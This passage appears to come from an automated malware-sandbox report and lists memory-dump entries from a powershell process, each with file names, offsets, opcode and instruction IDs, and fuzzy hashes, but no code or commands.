        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6ea5a5df380ce28d9c359b7873d2e877619263e07104494d8332f653d83091ac
        • Instruction ID: ff643f7b176ed73a6c5e59471bb07e394c88fd4c499da588fa24fca9d37f0fb6
        • Opcode Fuzzy Hash: 6ea5a5df380ce28d9c359b7873d2e877619263e07104494d8332f653d83091ac
        • Instruction Fuzzy Hash: 7FF02E763092449FCB051BBA9848CAB7FA9DFDE7513048025F64DCB251CE358D128371
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d95b4896eeadba3df04bcc2c02bef8aea9ad79945c8cade9fcf6d947f70e7c16
        • Instruction ID: 94a4ef333eb286d9c963e17dacf6683ff203a579655019b6aa2e607291343469
        • Opcode Fuzzy Hash: d95b4896eeadba3df04bcc2c02bef8aea9ad79945c8cade9fcf6d947f70e7c16
        • Instruction Fuzzy Hash: 15E0E53670021897CB146678DC145EE77AAEBC8251F04007ED902E3740DFB5DC05CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2f15ab1006c650890c7e878e8b2f182f1ff5831608a2417cfe2f417ada8c3601
        • Instruction ID: 6175f8799abf2acbcef9a65e616ede1e49d9223c30b206f1d053cdcceea0eb87
        • Opcode Fuzzy Hash: 2f15ab1006c650890c7e878e8b2f182f1ff5831608a2417cfe2f417ada8c3601
        • Instruction Fuzzy Hash: BAE02233306680AB8B114F8AAC44C8BBF69EF8A264309402AF608C7911CA314D1187A1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761666414.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_8450000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ad686316755a4664b61a75cac9cb56f3efdc507930347330206b1e81a94966a9
        • Instruction ID: 08ce227a772e1f1f44aaaa12940dcba869b6a4b3d16de5094bf083d2fc4dab36
        • Opcode Fuzzy Hash: ad686316755a4664b61a75cac9cb56f3efdc507930347330206b1e81a94966a9
        • Instruction Fuzzy Hash: 42E0C27A6003008BCB04E760F4497BE7363DFC4356F004879D655C7680DB38A9474791
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 050ff731d6b0d041cde9607d59d694a10cf7852650f946f8e3085aaeff4ab5be
        • Instruction ID: bab65a88557182453340f521717e84c2377372bdee9dd0e79bf12c85801cf65e
        • Opcode Fuzzy Hash: 050ff731d6b0d041cde9607d59d694a10cf7852650f946f8e3085aaeff4ab5be
        • Instruction Fuzzy Hash: 31D05E3D2101149FC345EB68E508E4577A9EB882617014095EA0987321CB75EC008B91
        Uniqueness

        Uniqueness Score: -1.00%